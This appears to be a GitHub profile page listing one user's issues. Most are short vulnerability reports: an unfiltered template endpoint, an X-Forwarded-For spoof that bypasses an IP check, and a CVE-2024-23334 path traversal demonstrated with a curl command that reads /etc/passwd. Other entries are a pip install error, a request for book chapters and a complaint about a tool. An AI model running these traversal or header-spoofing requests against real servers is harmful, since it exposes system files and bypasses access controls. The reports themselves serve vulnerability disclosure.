小健健

Results 33 issues of 小健健

/admin/themes/getTpl ![image](https://github.com/qinxuewu/blog-sharon/assets/71647398/e195c1f5-2404-4d23-8982-d43c459c771f) No filtering at all ![image](https://github.com/qinxuewu/blog-sharon/assets/71647398/ea4b2bb6-1817-484a-a5ad-157e9d5c1237)

![image](https://github.com/qinxuewu/blog-sharon/assets/71647398/08269154-9513-4be8-9e14-4dcc35014e0d) ![image](https://github.com/qinxuewu/blog-sharon/assets/71647398/025a876f-40ab-467f-9c5b-5137f6277076)

Added an `X-Forwarded-For: 127.0.0.2` header to the request ![image](https://github.com/qinxuewu/blog-sharon/assets/71647398/540fc48c-fa47-4daf-a765-89b139829a65) ![image](https://github.com/qinxuewu/blog-sharon/assets/71647398/b4623613-b63d-48fb-8006-e47092c40d1c) Suggested fix: disable multi-level proxies

When registering, fill in the username with `

Add an X-Forward-IP header when logging in

```
POST /admin/getLogin HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
Content-Type: application/x-www-form-urlencoded;...
```

This can cause [CVE-2024-23334](https://github.com/jhonnybonny/CVE-2024-23334)

```
apple@MacBook-Pro ~ % curl --path-as-is "http://127.0.0.1:8888/static/../../../../../../../../../etc/passwd"
##
# User Database
#
# Note that this file is consulted directly only when the system is running...
```

```
(venv) apple@MacBook-Pro chinese-pdf-ocr % pip3 install -r requirements.txt
Collecting opencv-python==4.5.3.56 (from -r requirements.txt (line 1))
  Using cached opencv-python-4.5.3.56.tar.gz (89.2 MB)
  Installing build dependencies ... error
  error: subprocess-exited-with-error
  × pip...
```

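Is there any chance that chapters 6, 7 and 8 will be released? I think it is very well written and well suited to beginners, and I feel I could learn a lot from the hands-on practice in these three chapters. If they can be released, I would be very grateful.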

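Are you waiting for someone else to do secondary development? Without batch processing, why wouldn't I just click through the website by hand instead of typing a pile of commands? Shouldn't batch processing be the most central requirement? Without batch processing, where is the value in using this tool? Why isn't this kind of requirement put first and delivered in the first version? Why, when other people raise an issue, is it treated as if nobody saw it? Is this requirement going to be ignored? I don't understand; I don't understand whether this is the development team's problem or TideSec's problem. Doing development this way really is not up to standard, thank you.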

and there is nothing but deleted the spaces, it's done